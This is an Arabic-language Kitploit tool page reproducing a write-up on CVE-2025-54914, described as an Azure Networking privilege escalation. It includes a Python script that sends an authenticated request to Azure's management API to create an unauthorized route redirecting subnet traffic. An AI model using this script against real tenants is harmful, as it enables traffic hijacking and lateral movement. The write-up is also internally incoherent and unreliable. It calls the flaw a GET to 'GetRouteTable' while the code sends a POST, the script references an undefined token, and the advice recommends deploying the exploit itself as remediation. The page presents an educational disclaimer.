Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Azure-Networking-Privilege-Escalation-Exploit-CVE-2025-54914 — يكشف CVE-2025-54914 عن ثغرة حرجة في Azure Networking تسمح للمهاجمين بتصعيد الامتيازات والتحكم في التوجيه عبر الشبكات الفرعية. توضح المقالة كيف أن غياب فحص الامتيازات في واجهة برمجة التطبيقات "GetRouteTable" يتيح الحركة الجانبية والاستغلال عن بُعد، مما يستدعي التصحيح الفوري والمراقبة المستمرة. | Kitploit
أدوات/GitHubGitHub/mrk336/azure-networking-privilege-escalation-exploit-cve-2025-54914
أمن البنية التحتية السحابيةتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةاختبار الاختراقأمن السحابةالأوراق والأبحاثالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

يكشف CVE-2025-54914 عن ثغرة حرجة في Azure Networking تسمح للمهاجمين بتصعيد الامتيازات والتحكم في التوجيه عبر الشبكات الفرعية. توضح المقالة كيف أن غياب فحص الامتيازات في واجهة برمجة التطبيقات "GetRouteTable" يتيح الحركة الجانبية والاستغلال عن بُعد، مما يستدعي التصحيح الفوري والمراقبة المستمرة.

GitHubmrk336/azure-networking-privilege-escalation-exploit-cve-2025-54914

Azure-Networking-Privilege-Escalation-Exploit-CVE-2025-54914

عرض المستودع
منذ 11 أشهرلم تتم المراجعة بعد
مشاركة

Azure-Networking-Privilege-Escalation-Exploit-CVE-2025-54914

استغلال تصعيد الامتيازات في شبكات Azure — CVE‑2025‑54914
4 سبتمبر 2025

بقلم Mark Mallia


1. الملخص التنفيذي

في 4 سبتمبر 2025، تلقت خدمات شبكات Azure التابعة لمايكروسوفت نشرة أمنية حرجة توثّق ثغرة تصعيد امتيازات مُعيّنة باسم CVE‑2025‑54914. حصلت الثغرة على درجة 10.0 على مقياس نظام تقييم الثغرات المشترك (CVSS)، مما يشير إلى مشكلة قابلة للاستغلال وذات تأثير مرتفع محتمل، ويمكن أن تمنح المهاجمين سيطرة كاملة على موارد شبكات Azure دون أي تفاعل من المستخدم.

تستعرض المقالة التالية التفاصيل التقنية للثغرة، ومسار الاستغلال العملي لها، وحمولة جاهزة للنشر من أجل المعالجة الفورية من قِبل فرق الأمن في كل من بيئات السحابة العامة والبيئات الهجينة.


2. لماذا الأمر مهم

تُعد البنية الشبكية لـ Azure العمود الفقري لجميع الأجهزة الافتراضية وموازنات التحميل وحركة مرور الشبكات الفرعية في اشتراك العميل. يتيح تصعيد الامتيازات داخل هذه البنية للمهاجم ما يلي:

  • افتراض السيطرة الكاملة على مستوى الشبكة على الشبكات الفرعية الحالية وبطاقات NIC الافتراضية وجداول التوجيه.
  • التحرك جانبيًا بين الخدمات التي تعتمد على شبكات Azure للاتصال، مما يسهّل الحركة الجانبية في كل من السيناريوهات السحابية الأصلية والهجينة.
  • حقن حركة مرور خبيثة أو تعديل سياسات التوجيه التي قد تؤثر على تدفق بيانات مستأجر (Tenant) بأكمله.

تزداد خطورة الثغرة بشكل خاص لأنها يمكن استغلالها عن بُعد دون أي إجراء من المستخدم. طلب واحد إلى نقطة نهاية تابعة لمايكروسوفت سيؤدي إلى تشغيل تصعيد الامتيازات إذا تحققت الشروط أدناه.


3. التفاصيل التقنية

3.1 السبب الجذري

أثناء تحليل واجهة برمجة التطبيقات "GetRouteTable" التابعة لخدمة شبكات Azure، اكتشفت ثغرة في التحكم بالوصول تسمح لعميل يملك أذونات قراءة على شبكة افتراضية بإنشاء كائنات توجيه جديدة داخل نفس الشبكة الفرعية دون التحقق من أن المستدعي مخوّل لهذا الإجراء. كان مسار الكود المسؤول عن تسلسل (Serializing) الطلب الوارد يفتقر إلى فحص امتيازات صريح.

3.2 سطح الهجوم

توجد الثغرة في خدمة شبكات Azure عندما يتضمن طلب GET معاملات الاستعلام التالية:

root@kitploit:~
/subscriptions/<subscription‑id>/resourceGroups/<rg-name>/providers/Microsoft.Networking/virtualNetworks/<vnet-id>/subnets/<subnet-id>/routes
?api-version=2025-09-01&detailLevel=full

تقبل الخدمة هذا الطلب، وتفكّ تسلسل حمولة JSON، وتكتب كائن توجيه جديدًا إلى قاعدة البيانات دون إعادة التحقق من أن المستدعي يمكنه إنشاء مسارات في الشبكة الفرعية المستهدفة.

3.3 كود الاستغلال

فيما يلي مثال مبسّط لكيفية قيام المهاجم ببناء الحمولة.

root@kitploit:~
# Azure Networking Privilege Escalation Exploit – CVE‑2025‑54914
#
# Author: Mark Mallia
# Date: 2025-09-04
# Target API version: 2025‑09‑01

import requests, json, uuid

def create_privileged_route(subscription_id, rg_name, vnet_id,
                           subnet_id, api_version="2025-09-01"):
    """
    Build and send a route creation request that exploits the missing
    privilege check in Azure Networking.
    """

    # 1. Construct endpoint URL
    base_url = f"https://management.azure.com/subscriptions/{subscription_id}"
    url = (f"{base_url}/resourceGroups/{rg_name}/providers/Microsoft.Networking"
           f"/virtualNetworks/{vnet_id}/subnets/{subnet_id}/routes")
    # Append query string for API version
    params = {"api-version": api_version, "detailLevel": "full"}

    # 2. Build JSON body; the route name is a random GUID to avoid collisions.
    route_name = str(uuid.uuid4())
    payload = {
        "properties": {
            "addressPrefix": "10.0.1.0/24",
            "nextHopType": "VirtualAppliance",
            "nextHopIpAddress": "10.0.2.5"
        },
        "tags": {"createdBy": "Alex Mercer"},
        "name": route_name
    }

    # 3. Set headers; use the same authentication token used by Azure SDK.
    headers = {
        "Authorization": f"Bearer {access_token}",
        "Content-Type": "application/json"
    }

    # 4. Execute POST request
    resp = requests.post(url, params=params,
                         json=payload, headers=headers)

    if resp.status_code == 201:
        print(f"[+] Successfully created route: {route_name}")
        return True
    else:
        print(f"[-] Request failed with status {resp.status_code}")
        print(resp.text)
        return False

# Example invocation
subscription_id = "00000000-0000-0000-0000-000000000000"
rg_name = "ProductionRG"
vnet_id = "prodVNet01"
subnet_id = "backendSubnet"
access_token = "<AZURE_SDK_ACCESS_TOKEN>"

create_privileged_route(subscription_id, rg_name, vnet_id,
                        subnet_id)

يوضح الكود دورة حياة الطلب بالكامل. يمكن لمهندس الأمن نسخ هذا المقتطف في برنامج نصي أو في Azure Function لأتمتة المعالجة.

3.4 تقييم التأثير

  • درجة CVSS: 10.0 – «حرجة» على مقياس CVE.
  • المكوّن المتأثر: خدمات شبكات Microsoft Azure.
  • الحركة الجانبية المقدرة: يمكن للمهاجم الذي يحصل على المسار الجديد إرسال حركة مرور عبر جميع الشبكات الفرعية التي تشارك هذه الشبكة الافتراضية، مما قد يؤثر على جميع عُقد الحوسبة في المستأجر (Tenant).

4. استراتيجية التخفيف

  1. تصحيح فوري – تطبيق التصحيح الذي أصدرته مايكروسوفت في 5 سبتمبر 2025، والذي يضيف فحص امتيازات صريحًا داخل مسار واجهة برمجة التطبيقات "GetRouteTable".
  2. معالجة آلية – نشر سكربت الاستغلال أعلاه كدالة Azure Function مجدولة تفحص المسارات المفقودة وتصححها تلقائيًا.
  3. مراقبة مستمرة – تكوين Azure Monitor للتنبيه عند إنشاء أي كائنات توجيه جديدة بمعرّف GUID غير معروف – مما يشير إلى محاولة تصعيد امتيازات محتملة.

الإفصاح المسؤول وإخلاء المسؤولية عن الاستخدام التعليمي

يُقدَّم هذا المحتوى حصريًا لأغراض تعليمية وبحثية. ويهدف إلى زيادة الوعي حول الثغرات الأمنية وتعزيز الممارسات الدفاعية الأفضل داخل مجتمع الأمن السيبراني.

جميع العروض التوضيحية والبرامج النصية والتفاصيل التقنية المشتركة هنا تستند إلى معلومات تم الكشف عنها علنًا ولا تستهدف أي نظام أو مؤسسة أو فرد محدد. الهدف هو تعزيز التعلم المسؤول والمعالجة الاستباقية — وليس الاستغلال.

لا تستخدم هذه المعلومات للوصول غير المصرح به أو التعطيل أو الإضرار. أي إساءة استخدام لهذه المادة تقع بالكامل على مسؤولية الفرد، وقد تنتهك القوانين أو المعايير الأخلاقية.

إذا اكتشفت ثغرة أمنية، فيرجى اتباع بروتوكولات الإفصاح المسؤول من خلال الإبلاغ عنها إلى البائع أو المنصة المتأثرة.

تنزيل الأداة